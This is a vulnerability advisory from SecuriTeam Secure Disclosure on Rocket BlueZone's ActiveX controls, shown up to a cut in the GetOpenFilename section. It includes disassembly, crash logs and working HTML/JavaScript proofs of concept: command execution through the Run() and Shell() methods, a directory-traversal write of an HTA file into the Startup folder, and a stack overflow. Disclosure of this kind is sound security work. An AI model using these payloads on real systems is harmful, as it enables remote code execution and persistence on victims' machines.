SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.
Introduction
Rocket BlueZone Terminal Emulation Suite is the solution you need if you are looking to replace your aging, expensive, current Terminal Emulation solution. Our software is a secure, slim, powerhouse of a solution built for the IBM Mainframe (TN3270), i Series (TN5250), UNIX/DEC (VT), Unisys (T27 & UTS) and secure File Transfer Protocol (FTP) systems.
Vulnerability Details
Multiple vulnerabilities have been found in Rocket BlueZone:
- WhllObj ActiveX Control Run Method Command Execution
- WhllObj ActiveX Control Shell Method Command Execution
- LIPI ActiveX Control SaveSettings Method Code Execution
- WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
- WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
- WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
- LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
- LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability
WhllObj ActiveX Control Run Method Command Execution
BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll progid: BZWhll.WhllObj.6.1 clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3} Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): true Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
This ActiveX control offers the insecure Run() method, see typelib:
... /* DISPID=17 */ /* VT_INT [22] */ function Run( /* VT_BSTR [8] [in] */ $CmdLine ) { /* method Run */ } ...
The ActiveX calls CreateProcessA() with user supplied command line parameters. As attachment, proof of concept code which launch calc.exe.
Call stack of thread 000042E8 Address Returns to Procedure / arguments Called from Frame Stack Dump 015ED028 03044ABB kernel32.CreateProcessA bzwhll.03044AB5 015ED0AC 015ED02C 00000000 ModuleFileName = NULL 015ED030 015ED0CC CommandLine = "cmd /c start calc" 015ED034 00000000 pProcessSecurity = NULL 015ED038 00000000 pThreadSecurity = NULL 015ED03C 00000000 InheritHandles = FALSE 015ED040 00000000 CreationFlags = 0 015ED044 00000000 pEnvironment = NULL 015ED048 00000000 CurrentDir = NULL 015ED04C 015ED058 pStartupInfo = 015ED058 015ED050 015ED09C pProcessInfo = 015ED09C 015ED0B0 03059CA0 ? bzwhll.03044A8E bzwhll.03059C9B 015ED1D8 77135CF9 Includes bzwhll.03059CA0 OLEAUT32.77135CF7 015ED1D4 03200048 003DEEB 015ED1F8 77136308 ? OLEAUT32.DispCallFunc OLEAUT32.77136303 015ED1F4 03200048 0000005 015ED288 03042493 Includes OLEAUT32.77136308 bzwhll.03042490 015ED284 02D3E324 0320004 015ED2B4 3C61302B Includes bzwhll.03042493 mshtml.3C613028 015ED2B0 03200048 0000001 015ED2F0 3C956B7D mshtml.3C612FEE mshtml.3C956B78 015ED2EC 03200048 0000001 015ED320 3C95350A mshtml.3C956A4B mshtml.3C953505 015ED31C 80020003 0000001 015ED34C 3C5FA571 Includes mshtml.3C95350A mshtml.3C5FA56E 015ED348 02B10400 0000001 015ED39C 3D7C3A8A Includes mshtml.3C5FA571 3D7C3A88 015ED398 02D64860 0000001 015ED3DC 3D7C39D6 3D7C39FC 3D7C39D1 015ED3D8 003DC708 0000001 015ED418 3D7C4F16 3D7C3987 3D7C4F11 015ED414 003DC708 0000040 015ED4D8 3D7C4E70 ? 3D7C4E7E 3D7C4E6B 015ED4D4 00000011 0000000 015ED50C 3D7C2D5D 3D7C244D 3D7C2D58 015ED508 003DC708 015ED53 015ED558 3D7C4225 3D7C2CEA 3D7C4220 015ED554 003DC708 0000000 015ED588 3D7C4F83 3D7C22E8 3D7C4F7E 015ED584 003DC708 0000000 015ED724 3D7C139B 3D7C0DC6 3D7C1396 015ED720 015ED738 015ED88 015ED80C 3D7C12D5 3D7C12FC 3D7C12D0 015ED808 015ED880 0000000 015ED858 3D7C1103 Includes 3D7C12D5 3D7C1101 015ED854 015ED880 0000000 015ED8D4 3D7A3EA3 3D7C0FB9 3D7A3E9E 015ED8D0 003DDF60 015EDA9 015ED920 3D7A553F ? 3D7A3D03 3D7A553A 015ED91C 003DC3F0 015EDA9 015ED984 3D7A534D 3D7A5356 3D7A5348 015ED980 003DC3F0 001DD2E 015ED9AC 3C53A47F Includes 3D7A534D mshtml.3C53A47C 015ED9A8 003DC3F4 0024EB7 015EDA04 3C53A1F1 mshtml.3C53A2F0 mshtml.3C53A1EC 015EDA00 02B250A0 0000000 015EDAC8 3C53A612 ? mshtml.3C53A233 mshtml.3C53A60D 015EDAC4 vulnerable code, bzwhll.dll: ;---------------------------------------------------------------------------------------------------- 10004A8E SUB_L10004A8E: 10004A8E 55 push ebp 10004A8F 8BEC mov ebp,esp 10004A91 83EC54 sub esp,00000054h 10004A94 56 push esi 10004A95 8D45AC lea eax,[ebp-54h] 10004A98 50 push eax 10004A99 33F6 xor esi,esi 10004A9B FF1570300310 call [KERNEL32.dll!GetStartupInfoA] 10004AA1 8D45F0 lea eax,[ebp-10h] 10004AA4 50 push eax 10004AA5 8D45AC lea eax,[ebp-54h] 10004AA8 50 push eax 10004AA9 FF7508 push [ebp+08h] 10004AAC 56 push esi 10004AAD 56 push esi 10004AAE 56 push esi 10004AAF 56 push esi 10004AB0 56 push esi 10004AB1 FF750C push [ebp+0Ch] 10004AB4 56 push esi 10004AB5 FF156C300310 call [KERNEL32.dll!CreateProcessA] //boom 10004ABB 85C0 test eax,eax 10004ABD 740E jz L10004ACD 10004ABF 8B75FC mov esi,[ebp-04h] 10004AC2 6AFF push FFFFFFFFh 10004AC4 FF75F0 push [ebp-10h] 10004AC7 FF1528330310 call [USER32.dll!WaitForInputIdle] 10004ACD L10004ACD: 10004ACD 8BC6 mov eax,esi 10004ACF 5E pop esi 10004AD0 C9 leave 10004AD1 C3 retn ;----------------------------------------------------------------------------------------------------
Proof of Concept
<html> <object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' /> </object> <script> obj.Run("cmd /c start calc"); </script>
WhllObj ActiveX Control Shell Method Command Execution
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll progid: BZWhll.WhllObj.6.1 clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3} Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): true Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
this ActiveX control offers the insecure Shell() method, see typelib:
... /* DISPID=106 */ /* VT_INT [22] */ function Shell( /* VT_BSTR [8] [in] */ $Application, /* VT_VARIANT [12] [in] */ $CommandLine, /* VT_VARIANT [12] [in] */ $WindowState, /* VT_VARIANT [12] [in] */ $Wait ) { /* method Shell */ } ...
The ActiveX calls CreateProcessA() with user supplied command line parameters. As attachment, proof of concept code which launch calc.exe.
Call stack of thread 000041C4 Address Returns to Procedure / arguments Called from Frame Stack Dump 015EAC2C 030F8215 kernel32.CreateProcessA bzwhll.030F820F 015EACE4 015EAC30 00000000 ModuleFileName = NULL 015EAC34 015EAD1C CommandLine = ""d:\windows\system32\cmd.exe" /c start calc" 015EAC38 00000000 pProcessSecurity = NULL 015EAC3C 00000000 pThreadSecurity = NULL 015EAC40 00000000 InheritHandles = FALSE 015EAC44 00000000 CreationFlags = 0 015EAC48 00000000 pEnvironment = NULL 015EAC4C 00000000 CurrentDir = NULL 015EAC50 015EAC64 pStartupInfo = 015EAC64 015EAC54 015EACA8 pProcessInfo = 015EACA8 vulnerable code, bzwhll.dll: ;---------------------------------------------------------------------------------------------------- 10028059 L10028059: 10028059 55 db 55h; 'U' 1002805A 8D db 8Dh; '?' 1002805B AC db ACh; '¿' 1002805C 24 db 24h; '$' 1002805D 40 db 40h; '@' 1002805E DB db DBh; '›' 1002805F FF db FFh; 'ï' 10028060 FF db FFh; 'ï' 10028061 B8 db B8h; 'ñ' 10028062 40 db 40h; '@' 10028063 25 db 25h; '%' 10028064 00 db 00h; 10028065 00 db 00h; 10028066 E8 db E8h; '¨' 10028067 F5 db F5h; 'å' 10028068 8B db 8Bh; '<' 10028069 00 db 00h; 1002806A 00 db 00h; 1002806B A1 db A1h; 'ö' 1002806C F4EC0410 dd L1004ECF4 10028070 33 db 33h; '3' 10028071 C5 db C5h; '…' 10028072 89 db 89h; '%' 10028073 85 db 85h; ':' 10028074 BC db BCh; '?' 10028075 24 db 24h; '$' 10028076 00 db 00h; 10028077 00 db 00h; 10028078 53 push ebx 10028079 56 push esi 1002807A 57 push edi 1002807B 8DB5E0240000 lea esi,[ebp+000024E0h] 10028081 8D7D10 lea edi,[ebp+10h] 10028084 A5 movsd 10028085 A5 movsd 10028086 A5 movsd 10028087 8B85CC240000 mov eax,[ebp+000024CCh] 1002808D 8B9DC8240000 mov ebx,[ebp+000024C8h] 10028093 A5 movsd 10028094 8DB5F0240000 lea esi,[ebp+000024F0h] 1002809A 8D7D28 lea edi,[ebp+28h] 1002809D A5 movsd 1002809E A5 movsd 1002809F A5 movsd 100280A0 A5 movsd 100280A1 8BBD00250000 mov edi,[ebp+00002500h] 100280A7 33F6 xor esi,esi 100280A9 3935A4F50410 cmp [L1004F5A4],esi 100280AF 894524 mov [ebp+24h],eax 100280B2 897D20 mov [ebp+20h],edi 100280B5 740D jz L100280C4 100280B7 53 push ebx 100280B8 68C8EA0310 push SSZ1003EAC8_WhllObj__Shell_____ 100280BD E895B4FEFF call SUB_L10013557 100280C2 59 pop ecx 100280C3 59 pop ecx 100280C4 L100280C4: 100280C4 8D4580 lea eax,[ebp-80h] 100280C7 50 push eax 100280C8 C685B823000000 mov byte ptr [ebp+000023B8h],00h 100280CF C685C013000000 mov byte ptr [ebp+000013C0h],00h 100280D6 FF1570300310 call [KERNEL32.dll!GetStartupInfoA] 100280DC 56 push esi 100280DD 56 push esi 100280DE 6804010000 push 00000104h 100280E3 8D85B8230000 lea eax,[ebp+000023B8h] 100280E9 50 push eax 100280EA 6AFF push FFFFFFFFh 100280EC FF7524 push [ebp+24h] 100280EF 56 push esi 100280F0 56 push esi 100280F1 FF156C310310 call [KERNEL32.dll!WideCharToMultiByte] 100280F7 83F801 cmp eax,00000001h 100280FA 7F10 jg L1002810C 100280FC 6A02 push 00000002h 100280FE 58 pop eax 100280FF 8983F7050000 mov [ebx+000005F7h],eax 10028105 8907 mov [edi],eax 10028107 E99F010000 jmp L100282AB 1002810C L1002810C: 1002810C 8D85D0240000 lea eax,[ebp+000024D0h] 10028112 50 push eax 10028113 E8A0B7FEFF call SUB_L100138B8 10028118 84C0 test al,al 1002811A 59 pop ecx 1002811B 7422 jz L1002813F 1002811D 68F60F0000 push 00000FF6h 10028122 8D85C0130000 lea eax,[ebp+000013C0h] 10028128 50 push eax 10028129 8D85D0240000 lea eax,[ebp+000024D0h] 1002812F 50 push eax 10028130 C685C013000000 mov byte ptr [ebp+000013C0h],00h 10028137 E897B5FEFF call SUB_L100136D3 1002813C 83C40C add esp,0000000Ch 1002813F L1002813F: 1002813F 66837D100A cmp word ptr [ebp+10h],000Ah 10028144 7420 jz L10028166 10028146 66F745100040 test word ptr [ebp+10h],4000h 1002814C 7407 jz L10028155 1002814E 8B4518 mov eax,[ebp+18h] 10028151 8A00 mov al,[eax] 10028153 EB03 jmp L10028158 10028155 L10028155: 10028155 8A4518 mov al,[ebp+18h] 10028158 L10028158: 10028158 FEC0 inc al 1002815A 834DAC01 or dword ptr [ebp-54h],00000001h 1002815E 660FB6C0 movzx ax,al 10028162 668945B0 mov [ebp-50h],ax 10028166 L10028166: 10028166 685CE60310 push L1003E65C 1002816B 8D4538 lea eax,[ebp+38h] 1002816E 50 push eax 1002816F FF155C300310 call [KERNEL32.dll!lstrcpyA] 10028175 8B3D60300310 mov edi,[KERNEL32.dll!lstrcatA] 1002817B 8D85B8230000 lea eax,[ebp+000023B8h] 10028181 50 push eax 10028182 8D4538 lea eax,[ebp+38h] 10028185 50 push eax 10028186 FFD7 call edi 10028188 685CE60310 push L1003E65C 1002818D 8D4538 lea eax,[ebp+38h] 10028190 50 push eax 10028191 FFD7 call edi 10028193 80BDC013000000 cmp byte ptr [ebp+000013C0h],00h 1002819A 7418 jz L100281B4 1002819C 6868850310 push L10038568 100281A1 8D4538 lea eax,[ebp+38h] 100281A4 50 push eax 100281A5 FFD7 call edi 100281A7 8D85C0130000 lea eax,[ebp+000013C0h] 100281AD 50 push eax 100281AE 8D4538 lea eax,[ebp+38h] 100281B1 50 push eax 100281B2 FFD7 call edi 100281B4 L100281B4: 100281B4 8D4538 lea eax,[ebp+38h] 100281B7 8945E4 mov [ebp-1Ch],eax 100281BA 8D45D4 lea eax,[ebp-2Ch] 100281BD 50 push eax 100281BE C745D43C000000 mov dword ptr [ebp-2Ch],0000003Ch 100281C5 C745D840050000 mov dword ptr [ebp-28h],00000540h 100281CC 8975DC mov [ebp-24h],esi 100281CF C745E0C0EA0310 mov dword ptr [ebp-20h],SSZ1003EAC0_Open 100281D6 8975E8 mov [ebp-18h],esi 100281D9 8975EC mov [ebp-14h],esi 100281DC C745F001000000 mov dword ptr [ebp-10h],00000001h 100281E3 FF15C0320310 call [SHELL32.dll!ShellExecuteExA] 100281E9 8B7D20 mov edi,[ebp+20h] 100281EC 8983F7050000 mov [ebx+000005F7h],eax 100281F2 8907 mov [edi],eax 100281F4 39B3F7050000 cmp [ebx+000005F7h],esi 100281FA 756F jnz L1002826B 100281FC 8D45C4 lea eax,[ebp-3Ch] 100281FF 50 push eax 10028200 8D4580 lea eax,[ebp-80h] 10028203 50 push eax 10028204 56 push esi 10028205 56 push esi 10028206 56 push esi 10028207 56 push esi 10028208 56 push esi 10028209 56 push esi 1002820A 8D4538 lea eax,[ebp+38h] 1002820D 50 push eax 1002820E 56 push esi 1002820F FF156C300310 call [KERNEL32.dll!CreateProcessA] //boom 10028215 8983F7050000 mov [ebx+000005F7h],eax 1002821B 8907 mov [edi],eax 1002821D 39B3F7050000 cmp [ebx+000005F7h],esi 10028223 0F8482000000 jz L100282AB 10028229 66837D280A cmp word ptr [ebp+28h],000Ah 1002822E 747B jz L100282AB 10028230 66F745280040 test word ptr [ebp+28h],4000h 10028236 7407 jz L1002823F 10028238 8B4530 mov eax,[ebp+30h] 1002823B 8A00 mov al,[eax] 1002823D EB03 jmp L10028242 1002823F L1002823F: 1002823F 8A4530 mov al,[ebp+30h] 10028242 L10028242: 10028242 84C0 test al,al 10028244 7465 jz L100282AB 10028246 EB18 jmp L10028260 10028248 L10028248: 10028248 6A64 push 00000064h 1002824A FF75C4 push [ebp-3Ch] 1002824D FF1508310310 call [KERNEL32.dll!WaitForSingleObject] 10028253 85C0 test eax,eax 10028255 7454 jz L100282AB 10028257 6A01 push 00000001h 10028259 8BCB mov ecx,ebx 1002825B E848EBFFFF call SUB_L10026DA8 10028260 L10028260: 10028260 80BB8656000000 cmp byte ptr [ebx+00005686h],00h 10028267 74DF jz L10028248 10028269 EB40 jmp L100282AB 1002826B L1002826B: 1002826B 66837D280A cmp word ptr [ebp+28h],000Ah 10028270 7439 jz L100282AB 10028272 66F745280040 test word ptr [ebp+28h],4000h 10028278 7407 jz L10028281 1002827A 8B4530 mov eax,[ebp+30h] 1002827D 8A00 mov al,[eax] 1002827F EB03 jmp L10028284 10028281 L10028281: 10028281 8A4530 mov al,[ebp+30h] 10028284 L10028284: 10028284 84C0 test al,al 10028286 7423 jz L100282AB 10028288 EB18 jmp L100282A2 1002828A L1002828A: 1002828A 6A64 push 00000064h 1002828C FF750C push [ebp+0Ch] 1002828F FF1508310310 call [KERNEL32.dll!WaitForSingleObject] 10028295 85C0 test eax,eax 10028297 7412 jz L100282AB 10028299 6A01 push 00000001h 1002829B 8BCB mov ecx,ebx 1002829D E806EBFFFF call SUB_L10026DA8 100282A2 L100282A2: 100282A2 80BB8656000000 cmp byte ptr [ebx+00005686h],00h 100282A9 74DF jz L1002828A 100282AB L100282AB: 100282AB 8B8DBC240000 mov ecx,[ebp+000024BCh] 100282B1 5F pop edi 100282B2 5E pop esi 100282B3 33CD xor ecx,ebp 100282B5 33C0 xor eax,eax 100282B7 5B pop ebx 100282B8 E88F890000 call SUB_L10030C4C 100282BD 81C5C0240000 add ebp,000024C0h 100282C3 C9 leave 100282C4 C23C00 retn 003Ch ;----------------------------------------------------------------------------------------------------
Proof of Concept
<HTML> <object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' /> </object> <script> obj.Shell("c:\\windows\\system32\\cmd.exe"," /c start calc",1,1); </script>
LIPI ActiveX Control SaveSettings Method Code Execution
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll progid: BlueZone.LIPI.6.1 clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3} implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): True description: LIPI Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
This ActiveX control offers the insecure SaveSettings() method, see typelib:
... /* DISPID=4 */ /* VT_I4 [3] */ function SaveSettings( /* VT_BSTR [8] [in] */ $__MIDL_0019 ) { /* method SaveSettings */ } ...
This method simply accepts a file name as argument and can be used to save arbitrary files into target computers. Also directory traversal sequences can be used. File content can be controlled by setting the ‘Username’ property.
Given this, a remote attacker could store an executable hta file inside automatic startup folders. As attachment, proof of concept code which launches calc.exe at the computer reboot.
Proof of Concept
<html> <object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' /> </object> <script> obj.Username = ">>>>>>>>>>>>>>><sc" + "ript>var x=new ActiveXObject(\"WScript.Shell\");x.Exec(\"calc.exe\");</sc" + "ript>"; obj.SaveSettings("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta"); </script>
WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll progid: BZWhll.WhllObj.6.1 clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3} Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): true Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the StatusBarText property, see typelib:
... /* DISPID=154 */ /* VT_BSTR [8] */ /* property StatusBarText */ var $StatusBarText; /* DISPID=154 */ /* property StatusBarText */ var $StatusBarText; ...
This property suffer of a stack based buffer overflow because of a copy loop inside bzwhll.dll. See vulnerable code below.
WinDBG shows: (6320.66b8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=02ca6a64 ebx=00002f0c ecx=00000041 edx=00000074 esi=7c813e21 edi=03550048 eip=0273e548 esp=015ecdd4 ebp=015ed1f8 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 bzwhll!DllGetClassObject+0x12a8d: 0273e548 888c1dfcfeffff mov byte ptr [ebp+ebx-104h],cl ss:0023:015f0000=4d 0:008> g (6320.66b8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000 eip=41414141 esp=015eca04 ebp=015eca24 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 <Unloaded_oy.dll>+0x41414140: 41414141 ?? ??? vulnerable code, bzwhll.dll ;---------------------------------------------------------------------------------------------------- 1001E379 L1001E379: 1001E379 55 push ebp 1001E37A 8BEC mov ebp,esp 1001E37C 81EC18040000 sub esp,00000418h 1001E382 A1F4EC0410 mov eax,[L1004ECF4] 1001E387 33C5 xor eax,ebp 1001E389 8945FC mov [ebp-04h],eax 1001E38C 53 push ebx 1001E38D 56 push esi 1001E38E 33DB xor ebx,ebx 1001E390 391DA4F50410 cmp [L1004F5A4],ebx 1001E396 57 push edi 1001E397 8B7D08 mov edi,[ebp+08h] 1001E39A 740D jz L1001E3A9 1001E39C 57 push edi 1001E39D 6820C10310 push SSZ1003C120_WhllObj__put_StatusBarText_____ 1001E3A2 E8B051FFFF call SUB_L10013557 1001E3A7 59 pop ecx 1001E3A8 59 pop ecx 1001E3A9 L1001E3A9: 1001E3A9 6800010000 push 00000100h 1001E3AE 8D85FCFEFFFF lea eax,[ebp-00000104h] 1001E3B4 53 push ebx 1001E3B5 50 push eax 1001E3B6 E8D1280100 call jmp_MSVCR80.dll!memset 1001E3BB 8B450C mov eax,[ebp+0Ch] 1001E3BE 83C40C add esp,0000000Ch 1001E3C1 663918 cmp [eax],bx 1001E3C4 0F8492010000 jz L1001E55C 1001E3CA 8B3560300310 mov esi,[KERNEL32.dll!lstrcatA] 1001E3D0 L1001E3D0: 1001E3D0 66833826 cmp word ptr [eax],0026h \ //scan for ampersand 1001E3D4 0F856C010000 jnz L1001E546 / 1001E3DA 83C002 add eax,00000002h 1001E3DD 8985F8FBFFFF mov [ebp-00000408h],eax 1001E3E3 0FB700 movzx eax,[eax] 1001E3E6 83F86F cmp eax,0000006Fh 1001E3E9 0F8FE7000000 jg L1001E4D6 1001E3EF 0F84D3000000 jz L1001E4C8 1001E3F5 83E826 sub eax,00000026h 1001E3F8 0F84C3000000 jz L1001E4C1 1001E3FE 83E83D sub eax,0000003Dh 1001E401 0F849D000000 jz L1001E4A4 1001E407 48 dec eax 1001E408 7463 jz L1001E46D 1001E40A 48 dec eax 1001E40B 48 dec eax 1001E40C 7430 jz L1001E43E 1001E40E 48 dec eax 1001E40F 48 dec eax 1001E410 7412 jz L1001E424 1001E412 83E804 sub eax,00000004h 1001E415 0F8514010000 jnz L1001E52F 1001E41B L1001E41B: 1001E41B 8D477B lea eax,[edi+7Bh] 1001E41E L1001E41E: 1001E41E 50 push eax 1001E41F E902010000 jmp L1001E526 1001E424 L1001E424: 1001E424 8D8DFCFDFFFF lea ecx,[ebp-00000204h] 1001E42A 51 push ecx 1001E42B 6A05 push 00000005h 1001E42D L1001E42D: 1001E42D 8B07 mov eax,[edi] 1001E42F 57 push edi 1001E430 FF907C070000 call [eax+0000077Ch] 1001E436 L1001E436: 1001E436 8D85FCFDFFFF lea eax,[ebp-00000204h] 1001E43C EBE0 jmp L1001E41E 1001E43E L1001E43E: 1001E43E 8B07 mov eax,[edi] 1001E440 8D8DFCFDFFFF lea ecx,[ebp-00000204h] 1001E446 51 push ecx 1001E447 6A08 push 00000008h 1001E449 57 push edi 1001E44A FF907C070000 call [eax+0000077Ch] 1001E450 80BDFCFDFFFF00 cmp byte ptr [ebp-00000204h],00h 1001E457 75DD jnz L1001E436 1001E459 6814C10310 push SSZ1003C114_Untitled 1001E45E 8D85FCFDFFFF lea eax,[ebp-00000204h] 1001E464 50 push eax 1001E465 FF155C300310 call [KERNEL32.dll!lstrcpyA] 1001E46B EBC9 jmp L1001E436 1001E46D L1001E46D: 1001E46D 8D85E8FBFFFF lea eax,[ebp-00000418h] 1001E473 50 push eax 1001E474 FF15A8300310 call [KERNEL32.dll!GetLocalTime] 1001E47A 6800010000 push 00000100h 1001E47F 8D85FCFDFFFF lea eax,[ebp-00000204h] 1001E485 50 push eax 1001E486 6800C10310 push SSZ1003C100_ddd__MMM_dd_yyyy 1001E48B 8D85E8FBFFFF lea eax,[ebp-00000418h] 1001E491 50 push eax 1001E492 6800000040 push 40000000h 1001E497 6800040000 push 00000400h 1001E49C FF15EC300310 call [KERNEL32.dll!GetTimeFormatA] 1001E4A2 EB92 jmp L1001E436 1001E4A4 L1001E4A4: 1001E4A4 80BFC605000000 cmp byte ptr [edi+000005C6h],00h 1001E4AB 8D85FCFEFFFF lea eax,[ebp-00000104h] 1001E4B1 7407 jz L1001E4BA 1001E4B3 68F4C00310 push SSZ1003C0F4_Connected 1001E4B8 EB72 jmp L1001E52C 1001E4BA L1001E4BA: 1001E4BA 68E4C00310 push SSZ1003C0E4_Disconnected 1001E4BF EB6B jmp L1001E52C 1001E4C1 L1001E4C1: 1001E4C1 68E0C00310 push L1003C0E0 1001E4C6 EB5E jmp L1001E526 1001E4C8 L1001E4C8: 1001E4C8 8D8DFCFDFFFF lea ecx,[ebp-00000204h] 1001E4CE 51 push ecx 1001E4CF 6A08 push 00000008h 1001E4D1 E957FFFFFF jmp L1001E42D 1001E4D6 L1001E4D6: 1001E4D6 83E872 sub eax,00000072h 1001E4D9 7446 jz L1001E521 1001E4DB 48 dec eax 1001E4DC 741C jz L1001E4FA 1001E4DE 48 dec eax 1001E4DF 7412 jz L1001E4F3 1001E4E1 48 dec eax 1001E4E2 48 dec eax 1001E4E3 0F8432FFFFFF jz L1001E41B 1001E4E9 48 dec eax 1001E4EA 7543 jnz L1001E52F 1001E4EC 68D8C00310 push SSZ1003C0D8_Seagull 1001E4F1 EB33 jmp L1001E526 1001E4F3 L1001E4F3: 1001E4F3 68D0C00310 push SSZ1003C0D0_Telnet 1001E4F8 EB2C jmp L1001E526 1001E4FA L1001E4FA: 1001E4FA 8A87C7050000 mov al,[edi+000005C7h] 1001E500 84C0 test al,al 1001E502 7507 jnz L1001E50B 1001E504 68BCC00310 push SSZ1003C0BC_IBM_3270_Terminal 1001E509 EB1B jmp L1001E526 1001E50B L1001E50B: 1001E50B 3C01 cmp al,01h 1001E50D 7507 jnz L1001E516 1001E50F 68A8C00310 push SSZ1003C0A8_IBM_5250_Terminal 1001E514 EB10 jmp L1001E526 1001E516 L1001E516: 1001E516 3C02 cmp al,02h 1001E518 7515 jnz L1001E52F 1001E51A 689CC00310 push SSZ1003C09C_VT_Terminal 1001E51F EB05 jmp L1001E526 1001E521 L1001E521: 1001E521 68AC4A0310 push SSZ10034AAC_BlueZone 1001E526 L1001E526: 1001E526 8D85FCFEFFFF lea eax,[ebp-00000104h] 1001E52C L1001E52C: 1001E52C 50 push eax 1001E52D FFD6 call esi 1001E52F L1001E52F: 1001E52F 8D85FCFEFFFF lea eax,[ebp-00000104h] 1001E535 50 push eax 1001E536 FF1558310310 call [KERNEL32.dll!lstrlenA] 1001E53C 8BD8 mov ebx,eax 1001E53E 8B85F8FBFFFF mov eax,[ebp-00000408h] 1001E544 EB0A jmp L1001E550 1001E546 L1001E546: 1001E546 8A08 mov cl,[eax] \ 1001E548 888C1DFCFEFFFF mov [ebp+ebx-00000104h],cl | <---------------- boom 1001E54F 43 inc ebx | 1001E550 L1001E550: | 1001E550 40 inc eax | 1001E551 40 inc eax | 1001E552 66833800 cmp word ptr [eax],0000h | 1001E556 0F8574FEFFFF jnz L1001E3D0 / 1001E55C L1001E55C: 1001E55C 6800010000 push 00000100h 1001E561 8D85FCFBFFFF lea eax,[ebp-00000404h] 1001E567 50 push eax 1001E568 6AFF push FFFFFFFFh 1001E56A 8D85FCFEFFFF lea eax,[ebp-00000104h] 1001E570 50 push eax 1001E571 6A01 push 00000001h 1001E573 6A00 push 00000000h 1001E575 FF1554310310 call [KERNEL32.dll!MultiByteToWideChar] 1001E57B 8D85FCFBFFFF lea eax,[ebp-00000404h] 1001E581 50 push eax 1001E582 FF15A0320310 call [OLEAUT32.dll!OLEAUT32.2] 1001E588 8BF0 mov esi,eax 1001E58A 8B07 mov eax,[edi] 1001E58C 56 push esi 1001E58D 57 push edi 1001E58E FF90B8030000 call [eax+000003B8h] 1001E594 56 push esi 1001E595 FF15A8320310 call [OLEAUT32.dll!OLEAUT32.6] 1001E59B 8B4DFC mov ecx,[ebp-04h] 1001E59E 5F pop edi 1001E59F 5E pop esi 1001E5A0 33CD xor ecx,ebp 1001E5A2 33C0 xor eax,eax 1001E5A4 5B pop ebx 1001E5A5 E8A2260100 call SUB_L10030C4C 1001E5AA C9 leave 1001E5AB C20800 retn 0008h ;----------------------------------------------------------------------------------------------------
Proof of Concept
<html> <object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' /> </object> <script> var x = ""; for (i=0; i<13000; i++){ x = x + "A"; } obj.StatusBarText = x; </script>
WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll progid: BZWhll.WhllObj.6.1 clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3} Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety): true Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the GetOpenFilename method, see typelib:
